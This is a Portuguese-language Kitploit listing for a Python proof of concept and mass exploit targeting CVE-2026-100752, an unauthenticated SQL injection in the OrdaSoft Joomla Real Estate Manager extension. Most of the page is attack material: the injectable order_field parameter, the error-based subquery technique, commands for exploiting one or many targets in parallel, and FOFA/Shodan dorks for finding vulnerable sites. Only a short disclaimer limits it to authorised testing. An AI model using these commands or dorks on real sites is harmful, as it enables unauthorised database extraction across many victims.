Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-100752 — PoC em Python 3 e exploit em massa para CVE-2026-100752, uma injeção SQL não autenticada no OrdaSoft Joomla Real Estate Manager <=6.7.8 através do parâmetro order_field ORDER BY. | Kitploit
Ferramentas/GitHubGitHub/murrez/cve-2026-100752
ReconhecimentoScanners de VulnerabilidadesAnálise de VulnerabilidadesExploraçãoScripting e AutomaçãoExploração de Aplicações WebColeta de InformaçõesSegurança WebTestes de Penetração
GitHubmurrez/cve-2026-100752

CVE-2026-100752

há 4 diasAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

PoC em Python 3 e exploit em massa para CVE-2026-100752, uma injeção SQL não autenticada no OrdaSoft Joomla Real Estate Manager <=6.7.8 através do parâmetro order_field ORDER BY.

Ver Repositório
Compartilhar

CVE-2026-100752 — OrdaSoft Real Estate Manager (Free) injeção SQL não autenticada

PoC em Python 3 para CVE-2026-100752 — extensão Joomla OrdaSoft Real Estate Manager (Free) ≤ 6.7.8. Corrigido em 6.7.9+.

PoCbithttps://pocbit.org/pocs/cve-2026-100752
Catálogohttps://pocbit.org/pocs/
Componentecom_realestatemanager
Arquivosite/realestatemanager.php
Parâmetroorder_field → ORDER BY (sem aspas, sem allow-list)
AutenticaçãoNenhuma (listagem pública / busca / visualizações de categoria)
CWECWE-89 Injeção SQL
TambémInjeção POST legada em order_direction (auditorias Metasploit / pré-6.7.9)

Saída do PoC (captura de tela)

Banner colorido do PoCbit, seguido da saída JSON do --mode exploit: exploited: true, vetor order_field_get, rota showCategory + com_realestatemanager.

CVE-2026-100752 exploit mode — PoCbit CLI and JSON result (order_field_get, sqli_extract_ok)

Comando de exemplo:

python poc.py -u https://TARGET --mode exploit --subquery "SELECT VERSION()"

(Captura de tela obtida em ambiente de teste autorizado; a URL de destino destina-se à validação do PoC.)


Resumo da vulnerabilidade (Türkçe)

Real Estate Manager (Free) é uma extensão da OrdaSoft para gerenciamento de anúncios imobiliários no Joomla. Nas versões 6.7.8 e anteriores, o parâmetro de requisição order_field é inserido diretamente na cláusula ORDER BY dentro de site/realestatemanager.php; não há allow-list de nomes de colunas, escape ou cast. Sem autenticação, consultas de navegação por categoria, resultados de busca e listagem completa de anúncios podem ser exploradas.

Com SQLi bem-sucedida, devem ser avaliados o risco de leitura do banco de dados (versão, hashes de usuários, dados do site), escrita/exclusão dependendo dos privilégios e RCE em cadeia. Atualize para a versão 6.7.9 ou superior (OrdaSoft security release).


Mecanismo técnico

Front controller do Joomla:

GET /index.php?option=com_realestatemanager&task=showCategory&catid=50&order_field=price&order_direction=asc

CVE-2026-100752: order_field controla a coluna/expressão do ORDER BY. Valores como subconsultas baseadas em erro podem ser injetados porque o valor é concatenado no SQL sem binding ou validação.

Contextos de consulta afetados (conforme o texto do CVE):

  1. Navegação por categoria (showCategory e relacionados)
  2. Resultados de busca
  3. Listagem completa de imóveis

Este PoC:

  • Fingerprint de com_realestatemanager (caminhos + versão opcional do manifest)
  • Scrape de catid / Itemid do HTML do site
  • Tarefas de sondagem: showCategory, showSearch, showSearchResult, showRent, showBuy
  • Primário: GET e POST baseados em erro em order_field
  • Fallback: order_direction=asc,<injection> (vetor histórico, ainda útil em algumas builds)
  • Check + mass check → hits.txt
  • Exploit + mass exploit → exploited.txt (linhas com vazamento bem-sucedido de SELECT)

Requisitos

cd CVE-2026-100752
pip install -r requirements.txt

Uso

Alvo único — check

python poc.py -u https://target.example --mode check
python poc.py -u https://target.example --mode check --aggressive

--aggressive tenta SELECT VERSION() quando a prova booleana/erro é inconclusiva.

Alvo único — exploit

python poc.py -u https://target.example --mode exploit
python poc.py -u https://target.example --mode exploit --subquery "SELECT user()"
python poc.py -u https://target.example --mode exploit --vector order_field_get

Massa em lote

python poc.py --list targets.example.txt --mode check -j 30 --output scan.jsonl --vuln-list hits.txt
python poc.py --list hits.txt --mode exploit -j 15 --subquery "SELECT VERSION()" --exploited-list exploited.txt
FlagFunção
--mode exploitExtração de dados baseada em erro (suporta massa)
--subquerySQL interno para payload de consulta dupla CONCAT(0x7e, …)
--vectorForça order_field_get, order_field_post ou order_direction_post
-jAlvos em paralelo
--no-colorTerminal simples

JSONL inclui pocbit, pocbit_catalog, pocbit_page, cve, component.


Dorks FOFA / descoberta de ativos

body="option=com_realestatemanager"
body="com_realestatemanager" && (body="ordasoft" || header="Joomla")
title="Real Estate" && body="com_realestatemanager"
body="/components/com_realestatemanager/"

Estilo Shodan (se suportado): http.html:com_realestatemanager

Exporte hostnames para targets.txt (uma URL por linha), depois check → hits → exploit apenas em imóveis autorizados.


Detecção de versão

Manifest (quando exposto):

  • /administrator/components/com_realestatemanager/realestatemanager.xml

Se versão ≤ 6.7.8 → likely_vulnerable_version. Se ≥ 6.7.9 → patched_version (o exploit ainda pode falhar).


CVEs relacionados (mesma linha de release)

CVETipoCorrigido
CVE-2026-100752SQLi não autenticada (order_field)6.7.9
CVE-2026-100753XSS refletido (visualizações públicas de imóveis)6.7.9

Mesmo lote do fornecedor (setembro de 2026): Vehicle Manager e outras extensões OrdaSoft receberam CVEs separados — corrija todos os componentes OrdaSoft que você executa.


Referências

  • PoCbit CVE-2026-100752
  • CVE.report CVE-2026-100752
  • JoomClub — seis falhas em três extensões OrdaSoft (setembro de 2026)
  • Metasploit: auxiliary/gather/joomla_com_realestatemanager_sqli (POST legado em order_direction)

Legal

Apenas para testes de segurança autorizados e validação de patches. Não use contra sistemas sem permissão.


Descrição do repositório GitHub

CVE-2026-100752 PoC: OrdaSoft Joomla Real Estate Manager (Free) <=6.7.8 unauth SQLi via order_field ORDER BY (com_realestatemanager). Colored check + mass exploit, version fingerprint, PoCbit https://pocbit.org/pocs/cve-2026-100752
Baixar ferramenta